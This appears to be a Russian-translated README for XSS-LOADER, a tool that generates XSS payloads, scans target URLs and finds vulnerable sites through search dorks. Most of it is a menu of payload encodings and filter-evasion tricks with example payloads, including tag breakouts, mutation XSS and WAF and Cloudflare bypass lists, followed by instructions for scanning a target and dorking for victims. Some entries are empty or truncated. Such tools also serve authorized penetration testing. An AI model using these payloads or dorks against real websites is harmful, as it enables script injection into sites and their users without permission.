
Xss Генератор нагрузок ~ Xss Сканер ~ Xss Поиск дорков

Все в одном инструменте для XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER
Instagram: TMRSWRR

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
python3 payloader.py
Устанавливает параметр по умолчанию: <script>alert(1)</script>
Устанавливает параметр по умолчанию: <div onpointerover='alert(1)'>MOVE HERE</div
Устанавливает параметр по умолчанию: ``````
Устанавливает параметр по умолчанию: <body ontouchstart=alert(1)>
Устанавливает параметр по умолчанию: <svg onload=alert('1')>
Кодирует полезную нагрузку, написанную пользователем
Кодирует полезную нагрузку на выбранном теге
* | 1. ВЕРХНИЙ РЕГИСТР----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. ВЕРХНИЙ И НИЖНИЙ РЕГИСТР----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL-КОДИРОВАНИЕ -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. КОДИРОВАНИЕ HTML СУЩНОСТЕЙ-----> <script>alert(1)</script>
* | 5. РАЗДЕЛЕНИЕ ПОЛЕЗНОЙ НАГРУЗКИ -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX-КОДИРОВАНИЕ -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 КОДИРОВАНИЕ -----> Encode payload to utf-16 format.
* | 8. UTF-32 КОДИРОВАНИЕ-----> Encode payload to utf-32 format.
* | 9. УДАЛЕНИЕ ТЕГА -----> ";alert('XSS');//
* | 10. UNICODE-КОДИРОВАНИЕ-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII КОДИРОВАНИЕ -----> ¼script¾alert(1)¼/script¾
* | 12. BASE64 КОДИРОВАНИЕ -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 КОДИРОВАНИЕ -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. ОБХОД СКОБОК -----> <script>alert`1`</script>
* | 15. UTF-8 КОДИРОВАНИЕ -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. ВЫХОД ЗА ПРЕДЕЛЫ ТЕГА-----> "><script>alert(1)</script>
* | 17. ВЫХОД ЗА ПРЕДЕЛЫ СКРИПТА-----> </script><script>alert(1)</script>
* | 18. ПОЛЕЗНАЯ НАГРУЗКА ДЛЯ ЗАГРУЗКИ ФАЙЛА-----> "><script>alert(1)</script>.gif
* | 19. ОБХОД ВНУТРИ КОММЕНТАРИЕВ-----> <!--><script>alert(1)</script>-->
* | 20. МУТАЦИОННАЯ ПОЛЕЗНАЯ НАГРУЗКА-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. НЕПРАВИЛЬНЫЙ IMG-----> <script>alert(1)</script>">
* | 22. ОБХОД ПРОБЕЛОВ----->
* | 23. СКРЫТЫЙ БЛОК DOWNLEVEL-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. ПОЛЕЗНЫЕ НАГРУЗКИ ДЛЯ ОБХОДА WAF-----> Show Waf Bypass Payload List
* | 25. ПОЛЕЗНЫЕ НАГРУЗКИ ДЛЯ ОБХОДА CLOUDFLARE-----> Show Cloudflare Bypass Payload List
* | 26. ПОЛЕЗНЫЕ НАГРУЗКИ POLYGLOT-----> Show Polyglot Bypass Payload List
* | 27. ПОЛЕЗНЫЕ НАГРУЗКИ ALERT-----> Show Alert Payload List
* | 28. СОЗДАТЬ ВСЕ ПОЛЕЗНЫЕ НАГРУЗКИ-----> Show Create All Payloads
* | 29. ВЕРНУТЬСЯ В ГЛАВНОЕ МЕНЮ
* | 30. ВЫХОД
Сначала вам нужно ввести URL цели Пожалуйста, введите URL как в этом примере: например, target -----> http://target.com/index.php?name= Выбранный список полезных нагрузок для сканирования
Результаты будут добавлены в файл "vulnpayload.txt" после сканирования.
Сначала введите дорк для поиска: например: inurl:"search.php?q=" Результаты будут сохранены в файл "dork.txt" после сканирования.
Ошибки Unicode
Ошибки модулей
Важно:
Если вы хотите использовать инструмент с Python3, установленным на Windows, скачайте по ссылке ниже:
https://github.com/capture0x/XSS-LOADER-for-WINDOWS
Для сообщений об ошибках или улучшениях, пожалуйста, откройте issue здесь.
Авторское право 2020